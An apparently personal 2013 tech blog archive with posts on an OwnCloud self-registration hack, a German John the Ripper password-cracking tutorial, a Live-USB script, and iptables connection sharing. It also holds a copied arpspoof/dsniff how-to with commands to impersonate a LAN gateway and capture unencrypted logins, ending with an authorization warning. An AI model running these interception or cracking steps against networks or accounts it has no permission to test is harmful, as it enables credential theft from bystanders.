Owncloud 6/7 with User Self Registration

Saturday, 23. November 2013

 

This Post is outdated!

Please use this Owncloud Application for owncloud 9 and higher!

thx
______________________________

On my school everyone is using some sort of cloud storage nowadays. there’s skydrive, googledrive, icloud and of course dropbox.  So i thought i’ll give them ONE cloud where they can share easily with each other and are in full control of their data.  There’s only one little problem. i don’t want to create 700-1000 accounts for students and teachers so it was clear that the users need to be able to register by themselves. it is enough work to delete all the accounts of dropouts and graduates anyway 🙂

since this feature is not implemented i decided to search the internet and i found a 4 months old ‘sort of functional’ implementation of the user “pellaeon” on github in a subtree (linked on mailing lists and forums).

i found out what is needed to make it work, fixed a lot of php bugs (introduced new ones ^^), CSS’ed it to fit in, ported it to owncloud 6 and added the option to filter “trusted” networks and only allow one registration per email address.

 

well there it is 🙂

registration (72KB zip)

(this file is containing the /registration/ folder – you can forget about the other files – they are for reference and information only)

 

loginemailcreate account

 

How To Install

1.) get OC 7

 https://owncloud.org/install/

 

2.) do not configure OC or create an admin user before finishing step 4 !

to install this on finalized installation you could always add the database table
‘pending_regist’ manually with an sqlite editor or phpmyadmin

3.) copy /registration/ folder into /core/ ( /core/registration/ )

4.) append table “pending_regist” to /db_structure.xml     ( right before the </database> closing tag )

<table>
<name>*dbprefix*pending_regist</name>
<declaration>
<field>
<name>email</name>
<type>text</type>
<default></default>
<notnull>true</notnull>
<length>64</length>
</field>
<field>
<name>token</name>
<type>text</type>
<default></default>
<notnull>false</notnull>
<length>256</length>
</field>
<field>
<name>requested</name>
<type>integer</type>
<default></default>
<notnull>true</notnull>
</field>
<index>
<name>pending_regist_pKey</name>
<primary>true</primary>
<field>
<name>requested</name>
<sorting>descending</sorting>
</field>
</index>
</declaration>
</table>

5.) append the following $classpath to /core/routes.php    ( last line )

OC::$CLASSPATH[‘OC_Core_Registration_Controller’] = ‘core/registration/controller.php’;
$this->create(‘core_registration_index’, ‘/register/’)
->get()
->action(‘OC_Core_Registration_Controller’, ‘index’);
$this->create(‘core_registration_send_email’, ‘/register/’)
->post()
->action(‘OC_Core_Registration_Controller’, ‘sendEmail’);
$this->create(‘core_registration_register_form’, ‘/register/verify/{token}’)
->get()
->action(‘OC_Core_Registration_Controller’, ‘registerForm’);
$this->create(‘core_registration_create_account’, ‘/register/verify/{token}’)
->post()
->action(‘OC_Core_Registration_Controller’, ‘createAccount’);

6.) append the following php code to /core/templates/login.php  ( last line )

require_once(‘core/registration/ip.php’);
if(fnmatch(“$iprange”, $_SERVER[‘REMOTE_ADDR’])){
$reglink = OC_Helper::linkToRoute(‘core_registration_index’);
echo “<p class=’info’> new to owncloud? <a href=’$reglink’ target=’_blank’> register! </a></p>”;
return;
}

 

7.) configure OC – create admin user (database with the new tables will be created)

8.) create a group for the new users called “selfregistered”

9.) logout

10.) give it a try

11.) change the value of $iprange in ‘core/registration/ip.php’ to your needs

wildcards allowed !
*    (everyone is allowed to register)
10.* ( registration is only available from local area network 10.xxx.xxx.xxx)
10.1.2.* (only subnet is allowed to register)

 

this is definitely an experiment. i’m no owncloud developer and i don’t have enough sparetime for doing it “right” (as owncloud APP for example)

the original creator stopped working on this 8 months ago so this is probably the best you can get right now..  if finally someone found the time to implement this as app – please let me know.. (email in the about.txt)

glhf

 

Passwörter knacken mit John The Ripper

Sunday, 17. November 2013

1) Download JTR.

http://www.openwall.com/john/

 

Download:

John the Ripper 1.8.0 (Unix – sources, tar.xz, 4.3 MB)

John the Ripper 1.8.x extra charset files archive (tar.xz, 4.5 MB)

 

 

2) Entpacken

tar -xzf john-1.8.0.tar.gz
tax -xzf john-extra.tar.xz

(copy contents of john-extra to john-1.8.0/run)

 

3) Kompilieren

cd john-1.8.0
cd src
make
make clean generic
 
cd ../run
./john (see info)

 

4) Verschlüsseltes Testpasswort erstellen (und in crackme.txt datei schreiben)

md5pass haus > crackme.txt
 
cat crackme.txt
$1$XLnBo3PA$KcSl0SOrz.fn0FLiTFfS.1

 

5) passwort knacken mit wordlist

./john --wordlist:password.lst crackme.txt

 

(Die Datei password.lst dient als passwort Wörterbuch. Umso mehr Einträge in dieser Datei zu finden sind umso höher die Chance das Passwort zu knacken. Man kann diese simple Textdatei selber beliebig erweitern)

 

6) passwort knacken – bruteforce (dauert sehr lange, probiert selbsttätig verschiedenste kombinationen aus und hängt nicht von einem wörterbuch ab)

./john -incremental:alpha crackme.txt (only letters)
./john -incremental:digits crackme.txt (only numbers)
./john -incremental:all crackme.txt (all characters)

 

7) Gefundene Passwörter anzeigen

john -show crackme.txt

 

8) Rainbowtables verwenden:

http://project-rainbowcrack.com/

 

http://de.wikipedia.org/wiki/Rainbow_Table

 

 

Create *ubuntu LIVE-USB from the command line

Thursday, 14. November 2013

You can hack usb-creator to do this.  (special thx to  Jay _silly_evarlast_ Wren who wrote about this at askubuntu.com)

You should already have a single vfat partition as partition 1 on the usb device and it should be marked bootable.

You could do this with a simple shellscript:

SDX="/dev/sdb"
sudo sfdisk -R $SDX
sudo sfdisk $SDX -D -uM << EOF
,4000
,2400
,;
EOF
sleep 4
sudo sfdisk $SDX -A 2
sudo sfdisk --id $SDX 2 b
sudo sfdisk -R $SDX
sudo mkfs.vfat -F 32 -n winshare ${SDX}1
sudo mkfs.vfat -F 32 -n system ${SDX}2
sudo mkfs.ext4 -L casper-rw ${SDX}3
sleep 1
sudo sfdisk -R $SDX

(this would create 3 partitions on sdb (winshare/system/casper-rw) casper-rw would come in place if you chose to add persistent to the syslinux.cfg file and store all the changes and  “system” would be the bootable installation target (sdb2) – winshare speaks for itself)

Next, we will get usb-creator python code to assist us. (we need bzr to get the sourcecode)

$ sudo apt-get install bzr

then…

$ bzr branch lp:usb-creator

create a file with this content and name it usb-creator-cli, place this file in the usb-creator directory (root of bzr branch)

#!/usr/bin/env python
from __future__ import print_function
from usbcreator.misc import sane_path, setup_gettext, setup_logging, text_type

from usbcreator.install import install

sane_path()
setup_logging()
setup_gettext()

#/dev/sdb1 should be mounted on /mnt
#iso should be mounted to /iso

dev = '/dev/sdb2' source = '/iso' target = '/mnt' ugh = install(source, target, False, device=dev) ugh.success = print ugh.failure = print ugh.progress = print ugh.progress_message = print ugh.progress_pulse = print ugh.progress_pulse_stop = print ugh.retry = print ugh.run()

Make it executeable

$ chmod +x usb-creator-cli

Now mount your iso to /iso and mount your usb device to /mnt

$ sudo mkdir /iso ; sudo mount ubuntu-server-12.10-amd64.iso /iso
$ sudo mount /dev/sdb1 /mnt

If you want very verbose messages at your console you can tail ~/.cache/usb-creator.log

$ tail -f ~/.cache/usb-creator.log &

Now run that usb-creator-cli script

$ sudo ./usb-creator-cli

And watch all the messages scroll by.

When you return to the prompt, don’t forget to unmount /mnt before you yank your usb storage device.

 

 

how to start a simple (temporary) webserver in current directory (with php support)

Sunday, 10. November 2013

With python 2.4 and later you can use the SimpleHTTPServer module like this

python -m SimpleHTTPServer [port]

This will start a HTTP server on port 8000 (if no port is specified) serving the files and directories which are in the current working dir.

for Python 3 use

 

python -m http.server [port]

 

If you need the web server to parse php files you should use the php webserver instead of the python webserver:

php -S 127.0.0.1:80 

Dsniff / Arpspoof HowTo

Saturday, 2. November 2013

 

This is a direct copy of  http://failshell.io/hacking/dsniff-howto/

Thank you for this neat howto!

 

Requirements

  • dsniff
  • arpspoof
  • the IP of your gateway
  • Linux machine (BSD would work too)
  • Enable IP forwarding (VERY IMPORTANT)

dsniff/arpspoof website

NOTE: On Debian/Ubuntu systems, both tools are packaged under ‘dsniff’.

Get your gateway’s IP

$ route -n
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
10.255.251.0    0.0.0.0         255.255.255.0   U     0      0        0 br0
192.168.122.0   0.0.0.0         255.255.255.0   U     0      0        0 virbr0
0.0.0.0         10.255.251.1    0.0.0.0         UG    0      0        0 br0

In this case, it would be 10.255.251.1.

Enable IP forwarding

Linux

# echo 1 > /proc/sys/net/ipv4/ip_forward

To make it permanent, add this line to /etc/sysctl.confnet.ipv4.ip_forward = 1

NOTE: If you don’t do this, no one will be able to use the network as your machine will refuse to forward packets to the gateway. You have been warned!

Arpspoof

This will make the clients on the network believe that your computer is the gateway. So make sure you enabled forwarding.

# arspoof 10.255.251.1

dsniff

This tool will sniff the traffic for unencrypted login and passwords. When it finds one, it will print it to stdout.

# dsniff -i br0 -mc

WARNING

Make sure you’re authorized to do this, because in many countries, that could be seen as hacking and/or spying. Laws differ in every country, but the results are often jail.

Share Internet Connection from GNU/Linux Systems

Saturday, 2. November 2013

this is a direct copy of http://saikatbasak.com/share-internet-connection/  Thank you for this neat howto!

_________________________ 

Now, here we have,

A computer connected to the Internet via the eth0 port (if you have a mobile broadband it would be ppp0).

We want to share the connection via the eth1 port of the same computer.

What we need,

We need basic networking utilities that is, in most cases, comes pre-installed in your GNU/Linux distribution (iptablesifconfig to be precise).

Yes, we do need some Lan Cables (Crossover cable) to share the connection via the eth1 port of the above mentioned computer.

So, let us begin. Connect your computer to the Internet. If u have a dhcp connection you may use dhclient or dhcpcd. Just do, as root, ‘dhclient eth0′, without the quotes. For connecting to mobile broadband you may use wvdial.

Flush iptables rules:

# iptables -F
# iptables -t nat -F
# iptables -t mangle -F
# iptables -X
# iptables -t nat -X
# iptables -t mangle -X

Enable kernel routing mode:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Also, you can make ip forward permanent by editing /etc/sysctl.conf and set net.ipv4.ip_forward = 1

Setup eth1:

# ifconfig eth1 10.10.10.1 netmask 255.255.255.0
# ifconfig eth1 up

( you may consider using a different ip address)

Set iptables rules for port forwarding:

# iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

That’s it. Now connect one end of the cable to the eth1 port of your server. Connect the other end to any computer or device such as a router or a switch.

Client side configuration example:

Ip address: 10.10.10.2
netmask: 255.255.255.0
gateway: 10.10.10.1
DNS server address: Same as the server (you may also use Google DNS or any other DNS of your preference)

# ifconfig eth0 10.10.10.2 netmask 255.255.255.0
# ifconfig eth0 up
# route add default gw 10.10.10.1 eth0
# echo "nameserver 8.8.8.8" > /etc/resolv.conf

Happy surfing.

 

____________________-